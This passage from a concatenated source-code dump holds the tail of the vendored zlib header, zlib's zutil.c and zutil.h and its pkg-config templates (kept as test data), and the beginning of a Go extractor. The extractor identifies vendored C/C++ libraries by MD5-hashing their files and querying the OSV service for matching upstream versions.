gzseek returns the resulting offset location as measured in bytes from the beginning of the uncompressed stream, or -1 in case of error, in particular if the file is opened for writing and the new starting position would be before the current position. */ ZEXTERN int ZEXPORT gzrewind(gzFile file); /* Rewind file. This function is supported only for reading. gzrewind(file) is equivalent to (int)gzseek(file, 0L, SEEK_SET). */ /* ZEXTERN z_off_t ZEXPORT gztell(gzFile file); Return the starting position for the next gzread or gzwrite on file. This position represents a number of bytes in the uncompressed data stream, and is zero when starting, even if appending or reading a gzip stream from the middle of a file using gzdopen(). gztell(file) is equivalent to gzseek(file, 0L, SEEK_CUR) */ /* ZEXTERN z_off_t ZEXPORT gzoffset(gzFile file); Return the current compressed (actual) read or write offset of file. This offset includes the count of bytes that precede the gzip stream, for example when appending or when using gzdopen() for reading. When reading, the offset does not include as yet unused buffered input. This information can be used for a progress indicator. On error, gzoffset() returns -1. */ ZEXTERN int ZEXPORT gzeof(gzFile file); /* Return true (1) if the end-of-file indicator for file has been set while reading, false (0) otherwise. Note that the end-of-file indicator is set only if the read tried to go past the end of the input, but came up short. Therefore, just like feof(), gzeof() may return false even if there is no more data to read, in the event that the last read request was for the exact number of bytes remaining in the input file. This will happen if the input file size is an exact multiple of the buffer size. If gzeof() returns true, then the read functions will return no more data, unless the end-of-file indicator is reset by gzclearerr() and the input file has grown since the previous end of file was detected. 
*/ ZEXTERN int ZEXPORT gzdirect(gzFile file); /* Return true (1) if file is being copied directly while reading, or false (0) if file is a gzip stream being decompressed. If the input file is empty, gzdirect() will return true, since the input does not contain a gzip stream. If gzdirect() is used immediately after gzopen() or gzdopen() it will cause buffers to be allocated to allow reading the file to determine if it is a gzip file. Therefore if gzbuffer() is used, it should be called before gzdirect(). When writing, gzdirect() returns true (1) if transparent writing was requested ("wT" for the gzopen() mode), or false (0) otherwise. (Note: gzdirect() is not needed when writing. Transparent writing must be explicitly requested, so the application already knows the answer. When linking statically, using gzdirect() will include all of the zlib code for gzip file reading and decompression, which may not be desired.) */ ZEXTERN int ZEXPORT gzclose(gzFile file); /* Flush all pending output for file, if necessary, close file and deallocate the (de)compression state. Note that once file is closed, you cannot call gzerror with file, since its structures have been deallocated. gzclose must not be called more than once on the same file, just as free must not be called more than once on the same allocation. gzclose will return Z_STREAM_ERROR if file is not valid, Z_ERRNO on a file operation error, Z_MEM_ERROR if out of memory, Z_BUF_ERROR if the last read ended in the middle of a gzip stream, or Z_OK on success. */ ZEXTERN int ZEXPORT gzclose_r(gzFile file); ZEXTERN int ZEXPORT gzclose_w(gzFile file); /* Same as gzclose(), but gzclose_r() is only for use when reading, and gzclose_w() is only for use when writing or appending. The advantage to using these instead of gzclose() is that they avoid linking in zlib compression or decompression code that is not used when only reading or only writing respectively. 
If gzclose() is used, then both compression and decompression code will be included in the application when linking to a static zlib library.
Usage example: uLong adler = adler32(0L, Z_NULL, 0); while (read_buffer(buffer, length) != EOF) { adler = adler32(adler, buffer, length); } if (adler != original_adler) error(); */ ZEXTERN uLong ZEXPORT adler32_z(uLong adler, const Bytef *buf, z_size_t len); /* Same as adler32(), but with a size_t length. */ /* ZEXTERN uLong ZEXPORT adler32_combine(uLong adler1, uLong adler2, z_off_t len2); Combine two Adler-32 checksums into one. For two sequences of bytes, seq1 and seq2 with lengths len1 and len2, Adler-32 checksums were calculated for each, adler1 and adler2. adler32_combine() returns the Adler-32 checksum of seq1 and seq2 concatenated, requiring only adler1, adler2, and len2. Note that the z_off_t type (like off_t) is a signed integer. If len2 is negative, the result has no meaning or utility. */ ZEXTERN uLong ZEXPORT crc32(uLong crc, const Bytef *buf, uInt len); /* Update a running CRC-32 with the bytes buf[0..len-1] and return the updated CRC-32. A CRC-32 value is in the range of a 32-bit unsigned integer. If buf is Z_NULL, this function returns the required initial value for the crc. Pre- and post-conditioning (one's complement) is performed within this function so it shouldn't be done by the application. Usage example: uLong crc = crc32(0L, Z_NULL, 0); while (read_buffer(buffer, length) != EOF) { crc = crc32(crc, buffer, length); } if (crc != original_crc) error(); */ ZEXTERN uLong ZEXPORT crc32_z(uLong crc, const Bytef *buf, z_size_t len); /* Same as crc32(), but with a size_t length. */ /* ZEXTERN uLong ZEXPORT crc32_combine(uLong crc1, uLong crc2, z_off_t len2); Combine two CRC-32 check values into one. For two sequences of bytes, seq1 and seq2 with lengths len1 and len2, CRC-32 check values were calculated for each, crc1 and crc2. crc32_combine() returns the CRC-32 check value of seq1 and seq2 concatenated, requiring only crc1, crc2, and len2. 
*/ /* ZEXTERN uLong ZEXPORT crc32_combine_gen(z_off_t len2); Return the operator corresponding to length len2, to be used with crc32_combine_op(). */ ZEXTERN uLong ZEXPORT crc32_combine_op(uLong crc1, uLong crc2, uLong op); /* Give the same result as crc32_combine(), using op in place of len2. op is is generated from len2 by crc32_combine_gen(). This will be faster than crc32_combine() if the generated op is used more than once. */ /* various hacks, don't look :) */ /* deflateInit and inflateInit are macros to allow checking the zlib version * and the compiler's view of z_stream: */ ZEXTERN int ZEXPORT deflateInit_(z_streamp strm, int level, const char *version, int stream_size); ZEXTERN int ZEXPORT inflateInit_(z_streamp strm, const char *version, int stream_size); ZEXTERN int ZEXPORT deflateInit2_(z_streamp strm, int level, int method, int windowBits, int memLevel, int strategy, const char *version, int stream_size); ZEXTERN int ZEXPORT inflateInit2_(z_streamp strm, int windowBits, const char *version, int stream_size); ZEXTERN int ZEXPORT inflateBackInit_(z_streamp strm, int windowBits, unsigned char FAR *window, const char *version, int stream_size); #ifdef Z_PREFIX_SET # define z_deflateInit(strm, level) \ deflateInit_((strm), (level), ZLIB_VERSION, (int)sizeof(z_stream)) # define z_inflateInit(strm) \ inflateInit_((strm), ZLIB_VERSION, (int)sizeof(z_stream)) # define z_deflateInit2(strm, level, method, windowBits, memLevel, strategy) \ deflateInit2_((strm),(level),(method),(windowBits),(memLevel),\ (strategy), ZLIB_VERSION, (int)sizeof(z_stream)) # define z_inflateInit2(strm, windowBits) \ inflateInit2_((strm), (windowBits), ZLIB_VERSION, \ (int)sizeof(z_stream)) # define z_inflateBackInit(strm, windowBits, window) \ inflateBackInit_((strm), (windowBits), (window), \ ZLIB_VERSION, (int)sizeof(z_stream)) #else # define deflateInit(strm, level) \ deflateInit_((strm), (level), ZLIB_VERSION, (int)sizeof(z_stream)) # define inflateInit(strm) \ inflateInit_((strm), 
ZLIB_VERSION, (int)sizeof(z_stream)) # define deflateInit2(strm, level, method, windowBits, memLevel, strategy) \ deflateInit2_((strm),(level),(method),(windowBits),(memLevel),\ (strategy), ZLIB_VERSION, (int)sizeof(z_stream)) # define inflateInit2(strm, windowBits) \ inflateInit2_((strm), (windowBits), ZLIB_VERSION, \ (int)sizeof(z_stream)) # define inflateBackInit(strm, windowBits, window) \ inflateBackInit_((strm), (windowBits), (window), \ ZLIB_VERSION, (int)sizeof(z_stream)) #endif #ifndef Z_SOLO /* gzgetc() macro and its supporting function and exposed data structure. Note * that the real internal state is much larger than the exposed structure. * This abbreviated structure exposes just enough for the gzgetc() macro. The * user should not mess with these exposed elements, since their names or * behavior could change in the future, perhaps even capriciously. They can * only be used by the gzgetc() macro. You have been warned. */ struct gzFile_s { unsigned have; unsigned char *next; z_off64_t pos; }; ZEXTERN int ZEXPORT gzgetc_(gzFile file); /* backward compatibility */ #ifdef Z_PREFIX_SET # undef z_gzgetc # define z_gzgetc(g) \ ((g)->have ? ((g)->have--, (g)->pos++, *((g)->next)++) : (gzgetc)(g)) #else # define gzgetc(g) \ ((g)->have ? 
((g)->have--, (g)->pos++, *((g)->next)++) : (gzgetc)(g)) #endif /* provide 64-bit offset functions if _LARGEFILE64_SOURCE defined, and/or * change the regular functions to 64 bits if _FILE_OFFSET_BITS is 64 (if * both are true, the application gets the *64 functions, and the regular * functions are changed to 64 bits) -- in case these are set on systems * without large file support, _LFS64_LARGEFILE must also be true */ #ifdef Z_LARGE64 ZEXTERN gzFile ZEXPORT gzopen64(const char *, const char *); ZEXTERN z_off64_t ZEXPORT gzseek64(gzFile, z_off64_t, int); ZEXTERN z_off64_t ZEXPORT gztell64(gzFile); ZEXTERN z_off64_t ZEXPORT gzoffset64(gzFile); ZEXTERN uLong ZEXPORT adler32_combine64(uLong, uLong, z_off64_t); ZEXTERN uLong ZEXPORT crc32_combine64(uLong, uLong, z_off64_t); ZEXTERN uLong ZEXPORT crc32_combine_gen64(z_off64_t); #endif #if !defined(ZLIB_INTERNAL) && defined(Z_WANT64) # ifdef Z_PREFIX_SET # define z_gzopen z_gzopen64 # define z_gzseek z_gzseek64 # define z_gztell z_gztell64 # define z_gzoffset z_gzoffset64 # define z_adler32_combine z_adler32_combine64 # define z_crc32_combine z_crc32_combine64 # define z_crc32_combine_gen z_crc32_combine_gen64 # else # define gzopen gzopen64 # define gzseek gzseek64 # define gztell gztell64 # define gzoffset gzoffset64 # define adler32_combine adler32_combine64 # define crc32_combine crc32_combine64 # define crc32_combine_gen crc32_combine_gen64 # endif # ifndef Z_LARGE64 ZEXTERN gzFile ZEXPORT gzopen64(const char *, const char *); ZEXTERN z_off_t ZEXPORT gzseek64(gzFile, z_off_t, int); ZEXTERN z_off_t ZEXPORT gztell64(gzFile); ZEXTERN z_off_t ZEXPORT gzoffset64(gzFile); ZEXTERN uLong ZEXPORT adler32_combine64(uLong, uLong, z_off_t); ZEXTERN uLong ZEXPORT crc32_combine64(uLong, uLong, z_off_t); ZEXTERN uLong ZEXPORT crc32_combine_gen64(z_off_t); # endif #else ZEXTERN gzFile ZEXPORT gzopen(const char *, const char *); ZEXTERN z_off_t ZEXPORT gzseek(gzFile, z_off_t, int); ZEXTERN z_off_t ZEXPORT gztell(gzFile); ZEXTERN 
z_off_t ZEXPORT gzoffset(gzFile); ZEXTERN uLong ZEXPORT adler32_combine(uLong, uLong, z_off_t); ZEXTERN uLong ZEXPORT crc32_combine(uLong, uLong, z_off_t); ZEXTERN uLong ZEXPORT crc32_combine_gen(z_off_t); #endif #else /* Z_SOLO */ ZEXTERN uLong ZEXPORT adler32_combine(uLong, uLong, z_off_t); ZEXTERN uLong ZEXPORT crc32_combine(uLong, uLong, z_off_t); ZEXTERN uLong ZEXPORT crc32_combine_gen(z_off_t); #endif /* !Z_SOLO */ /* undocumented functions */ ZEXTERN const char * ZEXPORT zError(int); ZEXTERN int ZEXPORT inflateSyncPoint(z_streamp); ZEXTERN const z_crc_t FAR * ZEXPORT get_crc_table(void); ZEXTERN int ZEXPORT inflateUndermine(z_streamp, int); ZEXTERN int ZEXPORT inflateValidate(z_streamp, int); ZEXTERN unsigned long ZEXPORT inflateCodesUsed(z_streamp); ZEXTERN int ZEXPORT inflateResetKeep(z_streamp); ZEXTERN int ZEXPORT deflateResetKeep(z_streamp); #if defined(_WIN32) && !defined(Z_SOLO) ZEXTERN gzFile ZEXPORT gzopen_w(const wchar_t *path, const char *mode); #endif #if defined(STDC) || defined(Z_HAVE_STDARG_H) # ifndef Z_SOLO ZEXTERN int ZEXPORTVA gzvprintf(gzFile file, const char *format, va_list va); # endif #endif #ifdef __cplusplus } #endif #endif /* ZLIB_H */ ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/zlib.pc.cmakein ================================================ prefix=@CMAKE_INSTALL_PREFIX@ exec_prefix=@CMAKE_INSTALL_PREFIX@ libdir=@INSTALL_LIB_DIR@ sharedlibdir=@INSTALL_LIB_DIR@ includedir=@INSTALL_INC_DIR@ Name: zlib Description: zlib compression library Version: @VERSION@ Requires: Libs: -L${libdir} -L${sharedlibdir} -lz Cflags: -I${includedir} ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/zlib.pc.in ================================================ prefix=@prefix@ exec_prefix=@exec_prefix@ libdir=@libdir@ sharedlibdir=@sharedlibdir@ includedir=@includedir@ Name: zlib Description: zlib 
compression library Version: @VERSION@ Requires: Libs: -L${libdir} -L${sharedlibdir} -lz Cflags: -I${includedir} ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/zutil.c ================================================ /* zutil.c -- target dependent utility functions for the compression library * Copyright (C) 1995-2017 Jean-loup Gailly * For conditions of distribution and use, see copyright notice in zlib.h */ /* @(#) $Id$ */ #include "zutil.h" #ifndef Z_SOLO # include "gzguts.h" #endif z_const char * const z_errmsg[10] = { (z_const char *)"need dictionary", /* Z_NEED_DICT 2 */ (z_const char *)"stream end", /* Z_STREAM_END 1 */ (z_const char *)"", /* Z_OK 0 */ (z_const char *)"file error", /* Z_ERRNO (-1) */ (z_const char *)"stream error", /* Z_STREAM_ERROR (-2) */ (z_const char *)"data error", /* Z_DATA_ERROR (-3) */ (z_const char *)"insufficient memory", /* Z_MEM_ERROR (-4) */ (z_const char *)"buffer error", /* Z_BUF_ERROR (-5) */ (z_const char *)"incompatible version",/* Z_VERSION_ERROR (-6) */ (z_const char *)"" }; const char * ZEXPORT zlibVersion(void) { return ZLIB_VERSION; } uLong ZEXPORT zlibCompileFlags(void) { uLong flags; flags = 0; switch ((int)(sizeof(uInt))) { case 2: break; case 4: flags += 1; break; case 8: flags += 2; break; default: flags += 3; } switch ((int)(sizeof(uLong))) { case 2: break; case 4: flags += 1 << 2; break; case 8: flags += 2 << 2; break; default: flags += 3 << 2; } switch ((int)(sizeof(voidpf))) { case 2: break; case 4: flags += 1 << 4; break; case 8: flags += 2 << 4; break; default: flags += 3 << 4; } switch ((int)(sizeof(z_off_t))) { case 2: break; case 4: flags += 1 << 6; break; case 8: flags += 2 << 6; break; default: flags += 3 << 6; } #ifdef ZLIB_DEBUG flags += 1 << 8; #endif /* #if defined(ASMV) || defined(ASMINF) flags += 1 << 9; #endif */ #ifdef ZLIB_WINAPI flags += 1 << 10; #endif #ifdef BUILDFIXED flags += 1 << 12; #endif #ifdef 
DYNAMIC_CRC_TABLE flags += 1 << 13; #endif #ifdef NO_GZCOMPRESS flags += 1L << 16; #endif #ifdef NO_GZIP flags += 1L << 17; #endif #ifdef PKZIP_BUG_WORKAROUND flags += 1L << 20; #endif #ifdef FASTEST flags += 1L << 21; #endif #if defined(STDC) || defined(Z_HAVE_STDARG_H) # ifdef NO_vsnprintf flags += 1L << 25; # ifdef HAS_vsprintf_void flags += 1L << 26; # endif # else # ifdef HAS_vsnprintf_void flags += 1L << 26; # endif # endif #else flags += 1L << 24; # ifdef NO_snprintf flags += 1L << 25; # ifdef HAS_sprintf_void flags += 1L << 26; # endif # else # ifdef HAS_snprintf_void flags += 1L << 26; # endif # endif #endif return flags; } #ifdef ZLIB_DEBUG #include # ifndef verbose # define verbose 0 # endif int ZLIB_INTERNAL z_verbose = verbose; void ZLIB_INTERNAL z_error(char *m) { fprintf(stderr, "%s\n", m); exit(1); } #endif /* exported to allow conversion of error code to string for compress() and * uncompress() */ const char * ZEXPORT zError(int err) { return ERR_MSG(err); } #if defined(_WIN32_WCE) && _WIN32_WCE < 0x800 /* The older Microsoft C Run-Time Library for Windows CE doesn't have * errno. We define it as a global variable to simplify porting. * Its value is always 0 and should not be used. */ int errno = 0; #endif #ifndef HAVE_MEMCPY void ZLIB_INTERNAL zmemcpy(Bytef* dest, const Bytef* source, uInt len) { if (len == 0) return; do { *dest++ = *source++; /* ??? to be unrolled */ } while (--len != 0); } int ZLIB_INTERNAL zmemcmp(const Bytef* s1, const Bytef* s2, uInt len) { uInt j; for (j = 0; j < len; j++) { if (s1[j] != s2[j]) return 2*(s1[j] > s2[j])-1; } return 0; } void ZLIB_INTERNAL zmemzero(Bytef* dest, uInt len) { if (len == 0) return; do { *dest++ = 0; /* ??? 
to be unrolled */ } while (--len != 0); } #endif #ifndef Z_SOLO #ifdef SYS16BIT #ifdef __TURBOC__ /* Turbo C in 16-bit mode */ # define MY_ZCALLOC /* Turbo C malloc() does not allow dynamic allocation of 64K bytes * and farmalloc(64K) returns a pointer with an offset of 8, so we * must fix the pointer. Warning: the pointer must be put back to its * original form in order to free it, use zcfree(). */ #define MAX_PTR 10 /* 10*64K = 640K */ local int next_ptr = 0; typedef struct ptr_table_s { voidpf org_ptr; voidpf new_ptr; } ptr_table; local ptr_table table[MAX_PTR]; /* This table is used to remember the original form of pointers * to large buffers (64K). Such pointers are normalized with a zero offset. * Since MSDOS is not a preemptive multitasking OS, this table is not * protected from concurrent access. This hack doesn't work anyway on * a protected system like OS/2. Use Microsoft C instead. */ voidpf ZLIB_INTERNAL zcalloc(voidpf opaque, unsigned items, unsigned size) { voidpf buf; ulg bsize = (ulg)items*size; (void)opaque; /* If we allocate less than 65520 bytes, we assume that farmalloc * will return a usable pointer which doesn't have to be normalized. 
*/ if (bsize < 65520L) { buf = farmalloc(bsize); if (*(ush*)&buf != 0) return buf; } else { buf = farmalloc(bsize + 16L); } if (buf == NULL || next_ptr >= MAX_PTR) return NULL; table[next_ptr].org_ptr = buf; /* Normalize the pointer to seg:0 */ *((ush*)&buf+1) += ((ush)((uch*)buf-0) + 15) >> 4; *(ush*)&buf = 0; table[next_ptr++].new_ptr = buf; return buf; } void ZLIB_INTERNAL zcfree(voidpf opaque, voidpf ptr) { int n; (void)opaque; if (*(ush*)&ptr != 0) { /* object < 64K */ farfree(ptr); return; } /* Find the original pointer */ for (n = 0; n < next_ptr; n++) { if (ptr != table[n].new_ptr) continue; farfree(table[n].org_ptr); while (++n < next_ptr) { table[n-1] = table[n]; } next_ptr--; return; } Assert(0, "zcfree: ptr not found"); } #endif /* __TURBOC__ */ #ifdef M_I86 /* Microsoft C in 16-bit mode */ # define MY_ZCALLOC #if (!defined(_MSC_VER) || (_MSC_VER <= 600)) # define _halloc halloc # define _hfree hfree #endif voidpf ZLIB_INTERNAL zcalloc(voidpf opaque, uInt items, uInt size) { (void)opaque; return _halloc((long)items, size); } void ZLIB_INTERNAL zcfree(voidpf opaque, voidpf ptr) { (void)opaque; _hfree(ptr); } #endif /* M_I86 */ #endif /* SYS16BIT */ #ifndef MY_ZCALLOC /* Any system without a special alloc function */ #ifndef STDC extern voidp malloc(uInt size); extern voidp calloc(uInt items, uInt size); extern void free(voidpf ptr); #endif voidpf ZLIB_INTERNAL zcalloc(voidpf opaque, unsigned items, unsigned size) { (void)opaque; return sizeof(uInt) > 2 ? 
(voidpf)malloc(items * size) : (voidpf)calloc(items, size); } void ZLIB_INTERNAL zcfree(voidpf opaque, voidpf ptr) { (void)opaque; free(ptr); } #endif /* MY_ZCALLOC */ #endif /* !Z_SOLO */ ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/zutil.h ================================================ /* zutil.h -- internal interface and configuration of the compression library * Copyright (C) 1995-2022 Jean-loup Gailly, Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* WARNING: this file should *not* be used by applications. It is part of the implementation of the compression library and is subject to change. Applications should only use zlib.h. */ /* @(#) $Id$ */ #ifndef ZUTIL_H #define ZUTIL_H #ifdef HAVE_HIDDEN # define ZLIB_INTERNAL __attribute__((visibility ("hidden"))) #else # define ZLIB_INTERNAL #endif #include "zlib.h" #if defined(STDC) && !defined(Z_SOLO) # if !(defined(_WIN32_WCE) && defined(_MSC_VER)) # include # endif # include # include #endif #ifndef local # define local static #endif /* since "static" is used to mean two completely different things in C, we define "local" for the non-static meaning of "static", for readability (compile with -Dlocal if your debugger can't find static symbols) */ typedef unsigned char uch; typedef uch FAR uchf; typedef unsigned short ush; typedef ush FAR ushf; typedef unsigned long ulg; #if !defined(Z_U8) && !defined(Z_SOLO) && defined(STDC) # include # if (ULONG_MAX == 0xffffffffffffffff) # define Z_U8 unsigned long # elif (ULLONG_MAX == 0xffffffffffffffff) # define Z_U8 unsigned long long # elif (UINT_MAX == 0xffffffffffffffff) # define Z_U8 unsigned # endif #endif extern z_const char * const z_errmsg[10]; /* indexed by 2-zlib_error */ /* (size given to avoid silly warnings with Visual C++) */ #define ERR_MSG(err) z_errmsg[Z_NEED_DICT-(err)] #define ERR_RETURN(strm,err) \ return (strm->msg = ERR_MSG(err), 
(err)) /* To be used only when the state is known to be valid */ /* common constants */ #ifndef DEF_WBITS # define DEF_WBITS MAX_WBITS #endif /* default windowBits for decompression. MAX_WBITS is for compression only */ #if MAX_MEM_LEVEL >= 8 # define DEF_MEM_LEVEL 8 #else # define DEF_MEM_LEVEL MAX_MEM_LEVEL #endif /* default memLevel */ #define STORED_BLOCK 0 #define STATIC_TREES 1 #define DYN_TREES 2 /* The three kinds of block type */ #define MIN_MATCH 3 #define MAX_MATCH 258 /* The minimum and maximum match lengths */ #define PRESET_DICT 0x20 /* preset dictionary flag in zlib header */ /* target dependencies */ #if defined(MSDOS) || (defined(WINDOWS) && !defined(WIN32)) # define OS_CODE 0x00 # ifndef Z_SOLO # if defined(__TURBOC__) || defined(__BORLANDC__) # if (__STDC__ == 1) && (defined(__LARGE__) || defined(__COMPACT__)) /* Allow compilation with ANSI keywords only enabled */ void _Cdecl farfree( void *block ); void *_Cdecl farmalloc( unsigned long nbytes ); # else # include # endif # else /* MSC or DJGPP */ # include # endif # endif #endif #ifdef AMIGA # define OS_CODE 1 #endif #if defined(VAXC) || defined(VMS) # define OS_CODE 2 # define F_OPEN(name, mode) \ fopen((name), (mode), "mbc=60", "ctx=stm", "rfm=fix", "mrs=512") #endif #ifdef __370__ # if __TARGET_LIB__ < 0x20000000 # define OS_CODE 4 # elif __TARGET_LIB__ < 0x40000000 # define OS_CODE 11 # else # define OS_CODE 8 # endif #endif #if defined(ATARI) || defined(atarist) # define OS_CODE 5 #endif #ifdef OS2 # define OS_CODE 6 # if defined(M_I86) && !defined(Z_SOLO) # include # endif #endif #if defined(MACOS) || defined(TARGET_OS_MAC) # define OS_CODE 7 # ifndef Z_SOLO # if defined(__MWERKS__) && __dest_os != __be_os && __dest_os != __win32_os # include /* for fdopen */ # else # ifndef fdopen # define fdopen(fd,mode) NULL /* No fdopen() */ # endif # endif # endif #endif #ifdef __acorn # define OS_CODE 13 #endif #if defined(WIN32) && !defined(__CYGWIN__) # define OS_CODE 10 #endif #ifdef _BEOS_ # 
define OS_CODE 16 #endif #ifdef __TOS_OS400__ # define OS_CODE 18 #endif #ifdef __APPLE__ # define OS_CODE 19 #endif #if defined(_BEOS_) || defined(RISCOS) # define fdopen(fd,mode) NULL /* No fdopen() */ #endif #if (defined(_MSC_VER) && (_MSC_VER > 600)) && !defined __INTERIX # if defined(_WIN32_WCE) # define fdopen(fd,mode) NULL /* No fdopen() */ # else # define fdopen(fd,type) _fdopen(fd,type) # endif #endif #if defined(__BORLANDC__) && !defined(MSDOS) #pragma warn -8004 #pragma warn -8008 #pragma warn -8066 #endif /* provide prototypes for these when building zlib without LFS */ #if !defined(_WIN32) && \ (!defined(_LARGEFILE64_SOURCE) || _LFS64_LARGEFILE-0 == 0) ZEXTERN uLong ZEXPORT adler32_combine64(uLong, uLong, z_off_t); ZEXTERN uLong ZEXPORT crc32_combine64(uLong, uLong, z_off_t); ZEXTERN uLong ZEXPORT crc32_combine_gen64(z_off_t); #endif /* common defaults */ #ifndef OS_CODE # define OS_CODE 3 /* assume Unix */ #endif #ifndef F_OPEN # define F_OPEN(name, mode) fopen((name), (mode)) #endif /* functions */ #if defined(pyr) || defined(Z_SOLO) # define NO_MEMCPY #endif #if defined(SMALL_MEDIUM) && !defined(_MSC_VER) && !defined(__SC__) /* Use our own functions for small and medium model with MSC <= 5.0. * You may have to use the same strategy for Borland C (untested). * The __SC__ check is for Symantec. 
*/ # define NO_MEMCPY #endif #if defined(STDC) && !defined(HAVE_MEMCPY) && !defined(NO_MEMCPY) # define HAVE_MEMCPY #endif #ifdef HAVE_MEMCPY # ifdef SMALL_MEDIUM /* MSDOS small or medium model */ # define zmemcpy _fmemcpy # define zmemcmp _fmemcmp # define zmemzero(dest, len) _fmemset(dest, 0, len) # else # define zmemcpy memcpy # define zmemcmp memcmp # define zmemzero(dest, len) memset(dest, 0, len) # endif #else void ZLIB_INTERNAL zmemcpy(Bytef* dest, const Bytef* source, uInt len); int ZLIB_INTERNAL zmemcmp(const Bytef* s1, const Bytef* s2, uInt len); void ZLIB_INTERNAL zmemzero(Bytef* dest, uInt len); #endif /* Diagnostic functions */ #ifdef ZLIB_DEBUG # include extern int ZLIB_INTERNAL z_verbose; extern void ZLIB_INTERNAL z_error(char *m); # define Assert(cond,msg) {if(!(cond)) z_error(msg);} # define Trace(x) {if (z_verbose>=0) fprintf x ;} # define Tracev(x) {if (z_verbose>0) fprintf x ;} # define Tracevv(x) {if (z_verbose>1) fprintf x ;} # define Tracec(c,x) {if (z_verbose>0 && (c)) fprintf x ;} # define Tracecv(c,x) {if (z_verbose>1 && (c)) fprintf x ;} #else # define Assert(cond,msg) # define Trace(x) # define Tracev(x) # define Tracevv(x) # define Tracec(c,x) # define Tracecv(c,x) #endif #ifndef Z_SOLO voidpf ZLIB_INTERNAL zcalloc(voidpf opaque, unsigned items, unsigned size); void ZLIB_INTERNAL zcfree(voidpf opaque, voidpf ptr); #endif #define ZALLOC(strm, items, size) \ (*((strm)->zalloc))((strm)->opaque, (items), (size)) #define ZFREE(strm, addr) (*((strm)->zfree))((strm)->opaque, (voidpf)(addr)) #define TRY_FREE(s, p) {if (p) ZFREE(s, p);} /* Reverse the bytes in a 32-bit value */ #define ZSWAP32(q) ((((q) >> 24) & 0xff) + (((q) >> 8) & 0xff00) + \ (((q) & 0xff00) << 8) + (((q) & 0xff) << 24)) #endif /* ZUTIL_H */ ================================================ FILE: internal/scalibrextract/filesystem/vendored/vendored.go ================================================ // Package vendored provides an extractor for vendored C/C++ code. 
package vendored

import (
	"bytes"
	"context"
	// MD5 is used in queryDetermineVersions only to fingerprint file contents
	// for the version lookup. It is not collision resistant, so a match is a
	// hint about the probable upstream version, not evidence that the vendored
	// files are unmodified.
	//nolint:gosec //md5 used to identify files, not for security purposes
	"crypto/md5"
	"errors"
	"fmt"
	"io"
	"io/fs"
	"path/filepath"
	"slices"
	"strings"

	cpb "github.com/google/osv-scalibr/binary/proto/config_go_proto"
	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scalibr/extractor/filesystem"
	scalibrfs "github.com/google/osv-scalibr/fs"
	"github.com/google/osv-scalibr/inventory"
	"github.com/google/osv-scalibr/plugin"
	"github.com/google/osv-scalibr/purl"
	"osv.dev/bindings/go/api"
	"osv.dev/bindings/go/osvdev"
)

var (
	// vendoredLibNames lists the directory names whose direct children are
	// treated as vendored libraries. FileRequired compares the parent
	// directory's base name against these keys as-is, while the walk in
	// queryDetermineVersions lower-cases the name before the lookup.
	vendoredLibNames = map[string]struct{}{
		"3rdparty":    {},
		"dep":         {},
		"deps":        {},
		"thirdparty":  {},
		"third-party": {},
		"third_party": {},
		"libs":        {},
		"external":    {},
		"externals":   {},
		"vendor":      {},
		"vendored":    {},
	}
	// fileExts lists the C/C++ file extensions whose contents are hashed; the
	// walk ignores files with any other extension.
	fileExts = []string{
		".hpp",
		".h",
		".hh",
		".cc",
		".c",
		".cpp",
	}
)

const (
	// Name is the unique name of this extractor.
	Name = "filesystem/vendored"
)

const (
	// This value may need to be tweaked, or be provided as a configurable flag.
	// Extract reports a package only when the first returned match scores
	// strictly above this value.
	// NOTE(review): the score presumably reflects how much of the directory
	// matched a known version; at 0.15 a reported commit does not imply that
	// every file matches upstream. Confirm against the API documentation.
	determineVersionThreshold = 0.15
	// The walk fails with an error once more than this many file hashes have
	// been collected for one directory.
	maxDetermineVersionFiles = 10000
)

// Config carries the settings that Configure copies onto an Extractor.
type Config struct {
	// ScanGitDir determines whether a vendored library with a git directory is scanned or not,
	// this is used to avoid duplicate results, once from git scanning, once from vendoredDir scanning
	ScanGitDir bool
	// OSVClient is the client used for the determine-version query.
	OSVClient *osvdev.OSVClient
}

// Extractor identifies vendored C/C++ libraries by hashing their source files
// and asking the OSV service which upstream version they resemble.
type Extractor struct {
	// ScanGitDir determines whether a vendored library with a git directory is scanned or not,
	// this is used to avoid duplicate results, once from git scanning, once from vendoredDir scanning
	ScanGitDir bool
	// OSVClient is the client used for the determine-version query; it stays
	// nil until Configure is called.
	OSVClient *osvdev.OSVClient
}

// New returns a new instance of the extractor.
// The plugin config argument is ignored and OSVClient is left nil, so the
// returned extractor has to be passed through Configure before Extract can
// query the OSV service.
func New(_ *cpb.PluginConfig) (filesystem.Extractor, error) {
	return &Extractor{}, nil
}

// Name of the extractor.
func (e *Extractor) Name() string { return Name }

// Version of the extractor.
func (e *Extractor) Version() int { return 0 }

// Requirements of the extractor.
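func (e *Extractor) Requirements() *plugin.Capabilities {
	// This extractor is handed directories rather than regular files.
	return &plugin.Capabilities{
		ExtractFromDirs: true,
	}
}

// FileRequired returns true for likely directories to contain vendored c/c++ code.
//
// A path qualifies when its parent directory is named exactly like one of the
// vendoredLibNames keys and the path itself is a directory.
//
// NOTE(review): this lookup is case sensitive, whereas the walk in
// queryDetermineVersions lower-cases directory names before consulting the
// same map; a parent named "Vendor" is therefore not picked up here. Confirm
// whether that difference is intended.
func (e *Extractor) FileRequired(fapi filesystem.FileAPI) bool {
	// Check if parent directory is one of the vendoredLibName
	// Clean first before Dir call to avoid trailing slashes causing problems
	parentDir := filepath.Base(filepath.Dir(filepath.Clean(fapi.Path())))
	if _, ok := vendoredLibNames[parentDir]; !ok {
		return false
	}

	// Stat costs performance, so perform it after the name check
	stat, err := fapi.Stat()
	if err != nil {
		return false
	}

	return stat.IsDir()
}

// Extract determines the most likely package version from the directory and returns them as
// commit hash inventory entries.
//
// The lookup is delegated to queryDetermineVersions, which sends the
// directory's base name together with the relative paths and MD5 digests of
// its C/C++ source files to the OSV service through e.OSVClient. Only the
// first match is considered, and only when its score is strictly greater than
// determineVersionThreshold; otherwise the returned inventory has no packages.
//
// An error is returned when no OSV client has been configured, or when hashing
// or the remote query fails.
func (e *Extractor) Extract(ctx context.Context, input *filesystem.ScanInput) (inventory.Inventory, error) {
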